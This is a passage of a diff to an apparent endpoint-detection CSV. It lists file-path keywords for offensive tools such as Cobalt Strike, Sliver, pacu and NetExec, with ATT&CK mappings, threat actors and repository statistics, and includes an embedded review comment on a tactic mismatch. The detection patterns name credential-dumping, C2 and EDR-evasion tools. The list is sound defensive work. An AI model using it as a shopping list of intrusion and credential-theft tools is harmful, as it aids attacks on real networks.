APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" "*/.cme/cme.conf*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*/.exegol/*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*/.local/share/pacu/*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3687","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" -"*/.manspider/logs*","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","N/A","8","8","772","119","2023-10-03T03:50:49Z","2020-03-18T13:27:20Z" -"*/.manspider/loot*","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. 
Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","N/A","8","8","772","119","2023-10-03T03:50:49Z","2020-03-18T13:27:20Z" +"*/.local/share/pacu/*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" +"*/.manspider/logs*","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","N/A","8","8","773","119","2023-10-04T11:08:17Z","2020-03-18T13:27:20Z" +"*/.manspider/loot*","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. 
Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","N/A","8","8","773","119","2023-10-04T11:08:17Z","2020-03-18T13:27:20Z" "*/.msf4/*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" -"*/.ntdissector*","offensive_tool_keyword","ntdissector","Ntdissector is a tool for parsing records of an NTDS database. Records are dumped in JSON format and can be filtered by object class.","T1003.003","TA0006 ","N/A","N/A","Credential Access","https://github.com/synacktiv/ntdissector","1","0","N/A","9","1","73","6","2023-10-03T14:17:00Z","2023-09-05T12:13:47Z" -"*/.sliver/logs*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" +"*/.ntdissector*","offensive_tool_keyword","ntdissector","Ntdissector is a tool for parsing records of an NTDS database. 
Records are dumped in JSON format and can be filtered by object class.","T1003.003","TA0006 ","N/A","N/A","Credential Access","https://github.com/synacktiv/ntdissector","1","0","N/A","9","1","75","6","2023-10-03T14:17:00Z","2023-09-05T12:13:47Z" +"*/.nxc/obfuscated_scripts/*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/.sliver/logs*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" "*/.ssh/RAI.pub*","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt 
Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/obscuritylabs/RAI","1","1","N/A","10","10","283","53","2021-10-06T17:44:19Z","2018-02-12T16:23:23Z" "*//:ptth*","offensive_tool_keyword","powershell","powershell obfuscations techniques observed by malwares - reversed http://","T1021 - T1024 - T1027 - T1035 - T1059 - T1070","TA0001 - TA0002 - TA0003 - TA0005 - TA0006","Qakbot","N/A","Defense Evasion","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*//:sptth*","offensive_tool_keyword","powershell","powershell obfuscations techniques observed by malwares - reversed https://","T1021 - T1024 - T1027 - T1035 - T1059 - T1070","TA0001 - TA0002 - TA0003 - TA0005 - TA0006","Qakbot","N/A","Defense Evasion","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" 
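Review bot: The added NetExec row (`*/.nxc/obfuscated_scripts/*`) sets `metadata_category` to "Credential Access", but its `metadata_tool_tactics` value `TA0007 - TA0003 - TA0002 - TA0001` omits TA0006. A consumer that filters on the tactics column will therefore not see it under credential access, whereas the ntdissector row just above it has the same category and does carry `TA0006`. Either add the tactic, e.g. `"TA0007 - TA0006 - TA0003 - TA0002 - TA0001"`, or choose the category that matches the listed tactics; the hunk does not show which was intended. The pattern also matches forward-slash paths only, while `metadata_enable_endpoint_detection` is `1`. If the tool creates the same directory on Windows hosts (not visible from this hunk), endpoint telemetry there would need a backslash variant of the keyword.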
@@ -2560,53 +2561,55 @@ "*/0xdarkvortex-*","offensive_tool_keyword","prometheus","malware C2","T1071 - T1071.001 - T1105 - T1105.002 - T1106 - T1574.002","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/paranoidninja/0xdarkvortex-MalwareDevelopment","1","1","N/A","10","10","176","63","2020-07-21T06:14:44Z","2018-09-04T15:38:53Z" "*/0xIronGoat/dirty-pipe*","offensive_tool_keyword","dirty-pipe","POC exploitation for dirty pipe vulnerability","T1068 - T1055 - T1003 - T1015","TA0001 - TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/0xIronGoat/dirty-pipe","1","1","N/A","N/A","1","9","9","2022-03-08T15:47:53Z","2022-03-08T15:30:45Z" "*/0xthirteen/*","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003 - TA0008 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/0xthirteen/SharpStay","1","1","N/A","10","5","416","95","2022-09-12T15:39:58Z","2020-01-24T22:22:07Z" -"*/0xthirteen/StayKit*","offensive_tool_keyword","StayKit","StayKit - Cobalt Strike persistence kit - StayKit is an extension for Cobalt Strike persistence by leveraging the execute_assembly function with the SharpStay .NET assembly. The aggressor script handles payload creation by reading the template files for a specific execution type.","T1059 - T1053 - T1124","TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/0xthirteen/StayKit","1","1","N/A","N/A","10","448","81","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z" +"*/0xthirteen/StayKit*","offensive_tool_keyword","StayKit","StayKit - Cobalt Strike persistence kit - StayKit is an extension for Cobalt Strike persistence by leveraging the execute_assembly function with the SharpStay .NET assembly. 
The aggressor script handles payload creation by reading the template files for a specific execution type.","T1059 - T1053 - T1124","TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/0xthirteen/StayKit","1","1","N/A","N/A","10","449","81","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z" "*/1mxml/CVE-2022-23131*","offensive_tool_keyword","POC","POC exploitaiton of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML)","T1190 - T1550 - T1078","TA0001 - TA0003","N/A","N/A","Exploitation tools","https://github.com/1mxml/CVE-2022-23131","1","1","N/A","N/A","1","3","1","2022-02-19T03:14:47Z","2022-02-18T14:48:53Z" "*/365-Stealer.git*","offensive_tool_keyword","365-Stealer","365-Stealer is a phishing simualtion tool written in python3. It can be used to execute Illicit Consent Grant Attack","T1111 - T1566.001 - T1078.004","TA0004 - TA0001 - TA0040","N/A","N/A","Phishing","https://github.com/AlteredSecurity/365-Stealer","1","1","N/A","10","3","288","74","2023-06-15T19:56:12Z","2020-09-20T18:22:36Z" "*/3DESEncryptor.go*","offensive_tool_keyword","Augustus","Augustus is a Golang loader that execute shellcode utilizing the process hollowing technique with anti-sandbox and anti-analysis measures. 
The shellcode is encrypted with the Triple DES (3DES) encryption algorithm.","T1055.012 - T1027.002 - T1136.001 - T1562.001","TA0005 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/TunnelGRE/Augustus","1","1","N/A","6","2","107","23","2023-08-27T10:37:51Z","2023-08-21T15:08:40Z" -"*/3snake.git*","offensive_tool_keyword","3snake","Tool for extracting information from newly spawned processes","T1003 - T1110 - T1552 - T1505","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/blendin/3snake","1","1","N/A","7","7","688","113","2022-02-14T17:42:10Z","2018-02-07T21:03:15Z" +"*/3snake.git*","offensive_tool_keyword","3snake","Tool for extracting information from newly spawned processes","T1003 - T1110 - T1552 - T1505","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/blendin/3snake","1","1","N/A","7","7","688","114","2022-02-14T17:42:10Z","2018-02-07T21:03:15Z" "*/4luc4rdr5290/CVE-2022-0847*","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1204 - T1055 - T1003 - T1015 - T1068 - T1059 - T1047","TA0001 - TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/4luc4rdr5290/CVE-2022-0847","1","1","N/A","N/A","1","1","2","2022-03-08T20:41:15Z","2022-03-08T20:18:28Z" "*/78dc91f1A716DBBAA9E4E12C884C1CB1C27FFF2BEEED7DF1*","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. 
These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","10","10","1362","429","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z" "*/78dc91f1A716DBBAA9E4E12C884C1CB1C27FFF2BEEED7DF1*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 
- TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","10","10","224","42","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z" -"*/AbandonedCOMKeys/*","offensive_tool_keyword","AbandonedCOMKeys","Enumerates abandoned COM keys (specifically InprocServer32). Useful for persistence","T1547.011 - T1049 - T1087.002","TA0005 - TA0007 - TA0003","N/A","N/A","Persistence","https://github.com/matterpreter/OffensiveCSharp/tree/master/AbandonedCOMKeys","1","1","N/A","10","10","1214","251","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*/AbandonedCOMKeys/*","offensive_tool_keyword","AbandonedCOMKeys","Enumerates abandoned COM keys (specifically InprocServer32). Useful for persistence","T1547.011 - T1049 - T1087.002","TA0005 - TA0007 - TA0003","N/A","N/A","Persistence","https://github.com/matterpreter/OffensiveCSharp/tree/master/AbandonedCOMKeys","1","1","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*/acarsd-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/AceLdr.cna*","offensive_tool_keyword","cobaltstrike","Cobalt Strike UDRL for memory scanner evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/kyleavery/AceLdr","1","1","N/A","10","10","712","123","2023-09-28T19:47:03Z","2022-08-11T00:06:09Z" +"*/AceLdr.cna*","offensive_tool_keyword","cobaltstrike","Cobalt Strike UDRL for memory scanner evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 
- T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/kyleavery/AceLdr","1","1","N/A","10","10","714","123","2023-09-28T19:47:03Z","2022-08-11T00:06:09Z" "*/acheron.git*","offensive_tool_keyword","acheron","indirect syscalls for AV/EDR evasion in Go assembly","T1055.012 - T1059.001 - T1059.003","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/f1zm0/acheron","1","1","N/A","N/A","3","244","31","2023-06-13T19:20:33Z","2023-04-07T10:40:33Z" "*/acheron.go*","offensive_tool_keyword","acheron","indirect syscalls for AV/EDR evasion in Go assembly","T1055.012 - T1059.001 - T1059.003","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/f1zm0/acheron","1","1","N/A","N/A","3","244","31","2023-06-13T19:20:33Z","2023-04-07T10:40:33Z" "*/ACLight.git*","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","AD Enumeration","https://github.com/cyberark/ACLight","1","1","N/A","7","8","730","150","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z" "*/ACLight/*","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","Information 
Gathering","https://github.com/cyberark/ACLight","1","1","N/A","N/A","8","730","150","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z" "*/acltoolkit*","offensive_tool_keyword","acltoolkit","acltoolkit is an ACL abuse swiss-army knife. It implements multiple ACL abuses","T1222.001 - T1222.002 - T1046","TA0007 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/zblurx/acltoolkit","1","1","N/A","N/A","2","108","14","2023-02-03T10:27:45Z","2022-01-12T22:45:49Z" -"*/acm_enum_cas_*.json*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3687","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" -"*/acm_enum_certs_*.json*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3687","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" -"*/acm_enum_certs_chain_*.json*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3687","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" -"*/acm_enum_certs_expired_*.json*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3687","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" 
-"*/acm_enum_certs_info_*.json*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3687","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" -"*/ActiveScanPlusPlus*","offensive_tool_keyword","ActiveScanPlusPlus","ActiveScan++ extends Burp Suite's active and passive scanning capabilities. Designed to add minimal network overhead. it identifies application behaviour that may be of interest to advanced testers","T1583 - T1595 - T1190","TA0001 - TA0002 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/albinowax/ActiveScanPlusPlus","1","1","N/A","N/A","6","568","192","2022-11-15T13:47:31Z","2014-06-23T10:04:13Z" +"*/acm_enum_cas_*.json*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" +"*/acm_enum_certs_*.json*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" +"*/acm_enum_certs_chain_*.json*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" 
+"*/acm_enum_certs_expired_*.json*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" +"*/acm_enum_certs_info_*.json*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" +"*/ActiveScanPlusPlus*","offensive_tool_keyword","ActiveScanPlusPlus","ActiveScan++ extends Burp Suite's active and passive scanning capabilities. Designed to add minimal network overhead. it identifies application behaviour that may be of interest to advanced testers","T1583 - T1595 - T1190","TA0001 - TA0002 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/albinowax/ActiveScanPlusPlus","1","1","N/A","N/A","6","568","191","2022-11-15T13:47:31Z","2014-06-23T10:04:13Z" "*/AD_Enumeration_Hunt*","offensive_tool_keyword","AD_Enumeration_Hunt","This repository contains a collection of PowerShell scripts and commands that can be used for Active Directory (AD) penetration testing and security assessment","T1018 - T1003 - T1033 - T1087 - T1069 - T1046 - T1069.002 - T1047 - T1083","TA0001 - TA0007 - TA0005 - TA0002 - TA0003","N/A","N/A","AD Enumeration","https://github.com/alperenugurlu/AD_Enumeration_Hunt","1","1","N/A","7","1","79","16","2023-08-05T06:10:26Z","2023-08-05T05:16:57Z" "*/ADACLScanner.git*","offensive_tool_keyword","ADACLScanner","A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .","T1222 - T1069 - T1018","TA0002 - TA0007 - 
TA0043","N/A","N/A","AD Enumeration","https://github.com/canix1/ADACLScanner","1","1","N/A","7","9","809","151","2023-09-12T21:35:21Z","2017-04-06T12:28:37Z" "*/adalanche/modules/*","offensive_tool_keyword","adalanche","Active Directory ACL Visualizer and Explorer - who's really Domain Admin?","T1484 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/lkarlslund/Adalanche","1","1","N/A","N/A","10","1202","119","2023-06-20T13:02:30Z","2020-10-07T10:07:22Z" -"*/adconnectdump.git*","offensive_tool_keyword","adconnectdump","Dump Azure AD Connect credentials for Azure AD and Active Directory","T1003.004 - T1059.001 - T1082","TA0006 - TA0002 - TA0007","N/A","N/A","Credential Access","https://github.com/fox-it/adconnectdump","1","1","N/A","10","6","506","84","2023-08-21T00:00:08Z","2019-04-09T07:41:42Z" -"*/adcs_enum/*","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
